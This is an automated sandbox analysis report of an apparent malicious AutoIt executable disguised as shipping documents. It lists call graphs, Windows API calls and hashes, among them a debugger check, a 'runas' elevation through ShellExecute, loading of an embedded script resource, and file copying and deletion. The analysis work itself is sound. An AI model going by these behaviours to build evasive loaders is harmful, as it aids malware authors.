100646->100647 100648 69fa5e 100647->100648 100676 6a60e7 100648->100676 100652 69fa90 100653 6977c7 59 API calls 100652->100653 100654 69fa9a 100653->100654 100704 6affde 100654->100704 100656 69fae1 100657 69faf1 GetStdHandle 100656->100657 100658 69fb3d 100657->100658 100659 6d49d5 100657->100659 100660 69fb45 OleInitialize 100658->100660 100659->100658 100661 6d49de 100659->100661 100660->100630 100711 6f6dda 64 API calls Mailbox 100661->100711 100663 6d49e5 100712 6f74a9 CreateThread 100663->100712 100665 6d49f1 CloseHandle 100665->100660 100713 6b021c 100666->100713 100669 6b021c 59 API calls 100670 6b0185 100669->100670 100671 6977c7 59 API calls 100670->100671 100672 6b0191 100671->100672 100673 697d2c 59 API calls 100672->100673 100674 69f8f6 100673->100674 100675 6b03a2 6 API calls 100674->100675 100675->100638 100677 6977c7 59 API calls 100676->100677 100678 6a60f7 100677->100678 100679 6977c7 59 API calls 100678->100679 100680 6a60ff 100679->100680 100720 6a5bfd 100680->100720 100683 6a5bfd 59 API calls 100684 6a610f 100683->100684 100685 6977c7 59 API calls 100684->100685 100686 6a611a 100685->100686 100687 6b0ff6 Mailbox 59 API calls 100686->100687 100688 69fa68 100687->100688 100689 6a6259 100688->100689 100690 6a6267 100689->100690 100691 6977c7 59 API calls 100690->100691 100692 6a6272 100691->100692 100693 6977c7 59 API calls 100692->100693 100694 6a627d 100693->100694 100695 6977c7 59 API calls 100694->100695 100696 6a6288 100695->100696 100697 6977c7 59 API calls 100696->100697 100698 6a6293 100697->100698 100699 6a5bfd 59 API calls 100698->100699 100700 6a629e 100699->100700 100701 6b0ff6 Mailbox 59 API calls 100700->100701 100702 6a62a5 RegisterWindowMessageW 100701->100702 100702->100652 100705 6affee 100704->100705 100706 6e5cc3 100704->100706 100707 6b0ff6 Mailbox 59 API calls 100705->100707 100723 6f9d71 60 API calls 100706->100723 100710 6afff6 100707->100710 100709 6e5cce 100710->100656 100711->100663 100712->100665 100724 6f748f 65 API calls 100712->100724 100714 6977c7 59 API calls 100713->100714 100715 6b0227 100714->100715 100716 6977c7 59 API calls 100715->100716 100717 6b022f 100716->100717 100718 6977c7 59 API calls 100717->100718 100719 6b017b 100718->100719 100719->100669 100721 6977c7 59 API calls 100720->100721 100722 6a5c05 100721->100722 100722->100683 100723->100709 100725 691016 100730 694ad2 100725->100730 100728 6b2f80 __cinit 67 API calls 100729 691025 100728->100729 100731 6b0ff6 Mailbox 59 API calls 100730->100731 100732 694ada 100731->100732 100733 69101b 100732->100733 100737 694a94 100732->100737 100733->100728 100738 694a9d 100737->100738 100739 694aaf 100737->100739 100740 6b2f80 __cinit 67 API calls 100738->100740 100741 694afe 100739->100741 100740->100739 100742 6977c7 59 API calls 100741->100742 100743 694b16 GetVersionExW 100742->100743 100744 697d2c 59 API calls 100743->100744 100745 694b59 100744->100745 100746 697e8c 59 API calls 100745->100746 100749 694b86 100745->100749 100747 694b7a 100746->100747 100748 697886 59 API calls 100747->100748 100748->100749 100750 6cdc8d 100749->100750 100751 694bf1 GetCurrentProcess IsWow64Process 100749->100751 100752 694c0a 100751->100752 100753 694c89 GetSystemInfo 100752->100753 100754 694c20 100752->100754 100755 694c56 100753->100755 100765 694c95 100754->100765 100755->100733 100758 694c7d GetSystemInfo 100760 694c47 100758->100760 100759 694c32 100761 694c95 2 API calls 100759->100761 100760->100755 100762 694c4d FreeLibrary 100760->100762 100763 694c3a GetNativeSystemInfo 100761->100763 100762->100755 100763->100760 100766 694c2e 100765->100766 100767 694c9e LoadLibraryA 100765->100767 100766->100758 100766->100759 100767->100766 100768 694caf GetProcAddress 100767->100768 100768->100766 100769 69e736 100772 69d260 100769->100772 100771 69e744 100773 69d27d 100772->100773 100801 69d4dd 100772->100801 100774 6d2abb 100773->100774 100775 6d2b0a 100773->100775 100804 69d2a4 100773->100804 100776 6d2abe 100774->100776 100786 6d2ad9 100774->100786 100816 70a6fb 331 API calls __cinit 100775->100816 100779 6d2aca 100776->100779 100776->100804 100814 70ad0f 331 API calls 100779->100814 100782 6b2f80 __cinit 67 API calls 100782->100804 100783 69d594 100808 698bb2 68 API calls 100783->100808 100784 6d2cdf 100784->100784 100785 69d6ab 100785->100771 100786->100801 100815 70b1b7 331 API calls 3 library calls 100786->100815 100790 6d2c26 100820 70aa66 89 API calls 100790->100820 100791 69d5a3 100791->100771 100794 698620 69 API calls 100794->100804 100801->100785 100821 6fa0b5 89 API calls 4 library calls 100801->100821 100802 69a000 331 API calls 100802->100804 100803 6981a7 59 API calls 100803->100804 100804->100782 100804->100783 100804->100785 100804->100790 100804->100794 100804->100801 100804->100802 100804->100803 100806 6988a0 68 API calls __cinit 100804->100806 100807 6986a2 68 API calls 100804->100807 100809 69859a 68 API calls 100804->100809 100810 69d0dc 331 API calls 100804->100810 100811 699f3a 59 API calls Mailbox 100804->100811 100812 69d060 89 API calls 100804->100812 100813 69cedd 331 API calls 100804->100813 100817 698bb2 68 API calls 100804->100817 100818 699e9c 60 API calls Mailbox 100804->100818 100819 6e6d03 60 API calls 100804->100819 100806->100804 100807->100804 100808->100791 100809->100804 100810->100804 100811->100804 100812->100804 100813->100804 100814->100785 100815->100801 100816->100804 100817->100804 100818->100804 100819->100804 100820->100801 100821->100784

                                                Executed Functions

                                                Function 00693B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00693B7A
                                                • IsDebuggerPresent.KERNEL32 ref: 00693B8C
                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,007562F8,007562E0,?,?), ref: 00693BFD
                                                  • Part of subcall function 00697D2C: _memmove.LIBCMT ref: 00697D66
                                                  • Part of subcall function 006A0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00693C26,007562F8,?,?,?), ref: 006A0ACE
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00693C81
                                                • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,007493F0,00000010), ref: 006CD4BC
                                                • SetCurrentDirectoryW.KERNEL32(?,007562F8,?,?,?), ref: 006CD4F4
                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00745D40,007562F8,?,?,?), ref: 006CD57A
                                                • ShellExecuteW.SHELL32(00000000,?,?), ref: 006CD581
                                                  • Part of subcall function 00693A58: GetSysColorBrush.USER32(0000000F), ref: 00693A62
                                                  • Part of subcall function 00693A58: LoadCursorW.USER32(00000000,00007F00), ref: 00693A71
                                                  • Part of subcall function 00693A58: LoadIconW.USER32(00000063), ref: 00693A88
                                                  • Part of subcall function 00693A58: LoadIconW.USER32(000000A4), ref: 00693A9A
                                                  • Part of subcall function 00693A58: LoadIconW.USER32(000000A2), ref: 00693AAC
                                                  • Part of subcall function 00693A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00693AD2
                                                  • Part of subcall function 00693A58: RegisterClassExW.USER32(?), ref: 00693B28
                                                  • Part of subcall function 006939E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00693A15
                                                  • Part of subcall function 006939E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00693A36
                                                  • Part of subcall function 006939E7: ShowWindow.USER32(00000000,?,?), ref: 00693A4A
                                                  • Part of subcall function 006939E7: ShowWindow.USER32(00000000,?,?), ref: 00693A53
                                                  • Part of subcall function 006943DB: _memset.LIBCMT ref: 00694401
                                                  • Part of subcall function 006943DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006944A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                • String ID: This is a third-party compiled AutoIt script.$runas$%r
                                                • API String ID: 529118366-374001893
                                                • Opcode ID: e1c5c1107b4051c57419013049cd2e2941550367ef1bc6de03f5d72db9654c24
                                                • Instruction ID: e6e3811b09d06b7770718add07cdf2e1b6a978c3c7bcd66af195e3a688b5e091
                                                • Opcode Fuzzy Hash: e1c5c1107b4051c57419013049cd2e2941550367ef1bc6de03f5d72db9654c24
                                                • Instruction Fuzzy Hash: BC51F970904248AACF51EBB4DC05EFD7B7EBF05701F40817DF815A36A1DAB85A46CB29
                                                Function 00694FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 983 694fe9-695001 CreateStreamOnHGlobal 984 695021-695026 983->984 985 695003-69501a FindResourceExW 983->985 986 6cdd5c-6cdd6b LoadResource 985->986 987 695020 985->987 986->987 988 6cdd71-6cdd7f SizeofResource 986->988 987->984 988->987 989 6cdd85-6cdd90 LockResource 988->989 989->987 990 6cdd96-6cdd9e 989->990 991 6cdda2-6cddb4 990->991 991->987
                                                APIs
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00694EEE,?,?,00000000,00000000), ref: 00694FF9
                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00694EEE,?,?,00000000,00000000), ref: 00695010
                                                • LoadResource.KERNEL32(?,00000000,?,?,00694EEE,?,?,00000000,00000000,?,?,?,?,?,?,00694F8F), ref: 006CDD60
                                                • SizeofResource.KERNEL32(?,00000000,?,?,00694EEE,?,?,00000000,00000000,?,?,?,?,?,?,00694F8F), ref: 006CDD75
                                                • LockResource.KERNEL32(Ni,?,?,00694EEE,?,?,00000000,00000000,?,?,?,?,?,?,00694F8F,00000000), ref: 006CDD88
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                • String ID: SCRIPT$Ni
                                                • API String ID: 3051347437-3595334624
                                                • Opcode ID: 1efb44215f06ee4ad8d41ecf30f3e5404798dc270e02e1def0afbb45c1f25e21
                                                • Instruction ID: c0232889ff79416fc621e1758d86f67550d48cbfb66bfdabcb10c43f911a8c8a
                                                • Opcode Fuzzy Hash: 1efb44215f06ee4ad8d41ecf30f3e5404798dc270e02e1def0afbb45c1f25e21
                                                • Instruction Fuzzy Hash: EE115E75240700AFDB218B69DC58FAB7BBEEBC9B11F10816CF406C66A0DB75E8018660
                                                Function 00694AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1047 694afe-694b5e call 6977c7 GetVersionExW call 697d2c 1052 694c69-694c6b 1047->1052 1053 694b64 1047->1053 1054 6cdb90-6cdb9c 1052->1054 1055 694b67-694b6c 1053->1055 1056 6cdb9d-6cdba1 1054->1056 1057 694c70-694c71 1055->1057 1058 694b72 1055->1058 1060 6cdba4-6cdbb0 1056->1060 1061 6cdba3 1056->1061 1059 694b73-694baa call 697e8c call 697886 1057->1059 1058->1059 1069 6cdc8d-6cdc90 1059->1069 1070 694bb0-694bb1 1059->1070 1060->1056 1063 6cdbb2-6cdbb7 1060->1063 1061->1060 1063->1055 1065 6cdbbd-6cdbc4 1063->1065 1065->1054 1067 6cdbc6 1065->1067 1071 6cdbcb-6cdbce 1067->1071 1072 6cdca9-6cdcad 1069->1072 1073 6cdc92 1069->1073 1070->1071 1074 694bb7-694bc2 1070->1074 1075 694bf1-694c08 GetCurrentProcess IsWow64Process 1071->1075 1076 6cdbd4-6cdbf2 1071->1076 1081 6cdcaf-6cdcb8 1072->1081 1082 6cdc98-6cdca1 1072->1082 1077 6cdc95 1073->1077 1078 694bc8-694bca 1074->1078 1079 6cdc13-6cdc19 1074->1079 1083 694c0a 1075->1083 1084 694c0d-694c1e 1075->1084 1076->1075 1080 6cdbf8-6cdbfe 1076->1080 1077->1082 1085 6cdc2e-6cdc3a 1078->1085 1086 694bd0-694bd3 1078->1086 1089 6cdc1b-6cdc1e 1079->1089 1090 6cdc23-6cdc29 1079->1090 1087 6cdc08-6cdc0e 1080->1087 1088 6cdc00-6cdc03 1080->1088 1081->1077 1091 6cdcba-6cdcbd 1081->1091 1082->1072 1083->1084 1092 694c89-694c93 GetSystemInfo 1084->1092 1093 694c20-694c30 call 694c95 1084->1093 1097 6cdc3c-6cdc3f 1085->1097 1098 6cdc44-6cdc4a 1085->1098 1094 694bd9-694be8 1086->1094 1095 6cdc5a-6cdc5d 1086->1095 1087->1075 1088->1075 1089->1075 1090->1075 1091->1082 1096 694c56-694c66 1092->1096 1104 694c7d-694c87 GetSystemInfo 1093->1104 1105 694c32-694c3f call 694c95 1093->1105 1100 6cdc4f-6cdc55 1094->1100 1101 694bee 1094->1101 1095->1075 1103 6cdc63-6cdc78 1095->1103 1097->1075 1098->1075 1100->1075 1101->1075 1106 6cdc7a-6cdc7d 1103->1106 1107 6cdc82-6cdc88 1103->1107 1108 694c47-694c4b 1104->1108 1112 694c41-694c45 GetNativeSystemInfo 1105->1112 1113 694c76-694c7b 1105->1113 1106->1075 1107->1075 1108->1096 1110 694c4d-694c50 FreeLibrary 1108->1110 1110->1096 1112->1108 1113->1112
                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 00694B2B
                                                  • Part of subcall function 00697D2C: _memmove.LIBCMT ref: 00697D66
                                                • GetCurrentProcess.KERNEL32(?,0071FAEC,00000000,00000000,?), ref: 00694BF8
                                                • IsWow64Process.KERNEL32(00000000), ref: 00694BFF
                                                • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00694C45
                                                • FreeLibrary.KERNEL32(00000000), ref: 00694C50
                                                • GetSystemInfo.KERNEL32(00000000), ref: 00694C81
                                                • GetSystemInfo.KERNEL32(00000000), ref: 00694C8D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                • String ID:
                                                • API String ID: 1986165174-0
                                                • Opcode ID: 5afb69325aa436f91ffd7c0d922f7730cd1f4f74af981271783f68d5f57da540
                                                • Instruction ID: baf1c58bf0b442ecc410c0e884477d6aa0ed512fa1ff918a1b840ca32062a45d
                                                • Opcode Fuzzy Hash: 5afb69325aa436f91ffd7c0d922f7730cd1f4f74af981271783f68d5f57da540
                                                • Instruction Fuzzy Hash: 7091D63154A7C4DECB31DB688451AEAFFEAAF25300B448DADD0CB93F41D624E909D719
                                                Function 0069E800 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Dtu$Dtu$Dtu$Dtu$Variable must be of type 'Object'.
                                                • API String ID: 0-2845289861
                                                • Opcode ID: 048d068c4c36ebcbea7efe615dd08c01f45e53663f7a7fd02bd16168594f0467
                                                • Instruction ID: 109a69a1ad78c8f5db55f6ad8200de41c5fc1d1fda61e28241dce8cd1c1af270
                                                • Opcode Fuzzy Hash: 048d068c4c36ebcbea7efe615dd08c01f45e53663f7a7fd02bd16168594f0467
                                                • Instruction Fuzzy Hash: 2AA27B74A04205CFCF24CF98C580AA9B7BBFF58304F25806AE916AB751D776ED42CB91
                                                Function 006F4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,006CE7C1), ref: 006F46A6
                                                • FindFirstFileW.KERNELBASE(?,?), ref: 006F46B7
                                                • FindClose.KERNEL32(00000000), ref: 006F46C7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: FileFind$AttributesCloseFirst
                                                • String ID:
                                                • API String ID: 48322524-0
                                                • Opcode ID: 47c5c7f36bfe3f83edfe4e84ebff3390f9584f2e1358abe3fa59c89816c14140
                                                • Instruction ID: d4e4076a32fa2d9cb2a682a6e4e28a4b39f2df5c2e7328ccbb2bf8dd5804bb79
                                                • Opcode Fuzzy Hash: 47c5c7f36bfe3f83edfe4e84ebff3390f9584f2e1358abe3fa59c89816c14140
                                                • Instruction Fuzzy Hash: DAE0D8314104055B4610673CEC4D4FF775D9F06335F108715FA35C15E0EBB459508599
                                                Function 006A0B30 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006A0BBB
                                                • timeGetTime.WINMM ref: 006A0E76
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006A0FB3
                                                • TranslateMessage.USER32(?), ref: 006A0FC7
                                                • DispatchMessageW.USER32(?), ref: 006A0FD5
                                                • Sleep.KERNEL32(0000000A), ref: 006A0FDF
                                                • LockWindowUpdate.USER32(00000000,?,?), ref: 006A105A
                                                • DestroyWindow.USER32 ref: 006A1066
                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006A1080
                                                • Sleep.KERNEL32(0000000A,?,?), ref: 006D52AD
                                                • TranslateMessage.USER32(?), ref: 006D608A
                                                • DispatchMessageW.USER32(?), ref: 006D6098
                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006D60AC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pru$pru$pru$pru
                                                • API String ID: 4003667617-3117017571
                                                • Opcode ID: c05b3a1b0ff0f10862aedbec5304dec386b9b11eb16b7dd9513e3d36a54993ea
                                                • Instruction ID: 8cb32180574a9bec3bdb7653c41e2e80fc0fb0a998a9b51e6633be860fe31686
                                                • Opcode Fuzzy Hash: c05b3a1b0ff0f10862aedbec5304dec386b9b11eb16b7dd9513e3d36a54993ea
                                                • Instruction Fuzzy Hash: 5EB2D170A08741DFDB24DF24C884BAAB7E6BF85304F14891EE44A877A1DB75EC45CB86
                                                Function 006F93DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 006F91E9: __time64.LIBCMT ref: 006F91F3
                                                  • Part of subcall function 00695045: _fseek.LIBCMT ref: 0069505D
                                                • __wsplitpath.LIBCMT ref: 006F94BE
                                                  • Part of subcall function 006B432E: __wsplitpath_helper.LIBCMT ref: 006B436E
                                                • _wcscpy.LIBCMT ref: 006F94D1
                                                • _wcscat.LIBCMT ref: 006F94E4
                                                • __wsplitpath.LIBCMT ref: 006F9509
                                                • _wcscat.LIBCMT ref: 006F951F
                                                • _wcscat.LIBCMT ref: 006F9532
                                                  • Part of subcall function 006F922F: _memmove.LIBCMT ref: 006F9268
                                                  • Part of subcall function 006F922F: _memmove.LIBCMT ref: 006F9277
                                                • _wcscmp.LIBCMT ref: 006F9479
                                                  • Part of subcall function 006F99BE: _wcscmp.LIBCMT ref: 006F9AAE
                                                  • Part of subcall function 006F99BE: _wcscmp.LIBCMT ref: 006F9AC1
                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006F96DC
                                                • _wcsncpy.LIBCMT ref: 006F974F
                                                • DeleteFileW.KERNEL32(?,?), ref: 006F9785
                                                • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 006F979B
                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006F97AC
                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006F97BE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                • String ID:
                                                • API String ID: 1500180987-0
                                                • Opcode ID: d56cb253b2209ea3a40e15a26dc0d0522a2c26404c7df566ca2d898e67ce15c6
                                                • Instruction ID: 1513e7f314fb2123951337199c3b1082144f3d887adf3fabc1da6491cec649c9
                                                • Opcode Fuzzy Hash: d56cb253b2209ea3a40e15a26dc0d0522a2c26404c7df566ca2d898e67ce15c6
                                                • Instruction Fuzzy Hash: F6C11DB1D0021DAADF51DF95CC85EEEB7BEAF45300F0040AAF609E7151DB709A858F69
                                                Function 00693015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72windowregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00693074
                                                • RegisterClassExW.USER32(00000030), ref: 0069309E
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006930AF
                                                • InitCommonControlsEx.COMCTL32(?), ref: 006930CC
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006930DC
                                                • LoadIconW.USER32(000000A9), ref: 006930F2
                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00693101
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: 9d69c732df83d017500fb56be1860ad0807d3e59711d211db974240723b33857
                                                • Instruction ID: 1d5e5c2e1c9e70ac02c5c75cb7ad2fc1767030f68961a4c31378e1ca6101118f
                                                • Opcode Fuzzy Hash: 9d69c732df83d017500fb56be1860ad0807d3e59711d211db974240723b33857
                                                • Instruction Fuzzy Hash: EF3158B1841308AFDB00DFA8D889AD9BBF0FB09320F14C16EE540EB2A1D7BA5541CF94
                                                Function 00693041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00693074
                                                • RegisterClassExW.USER32(00000030), ref: 0069309E
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006930AF
                                                • InitCommonControlsEx.COMCTL32(?), ref: 006930CC
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006930DC
                                                • LoadIconW.USER32(000000A9), ref: 006930F2
                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00693101
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
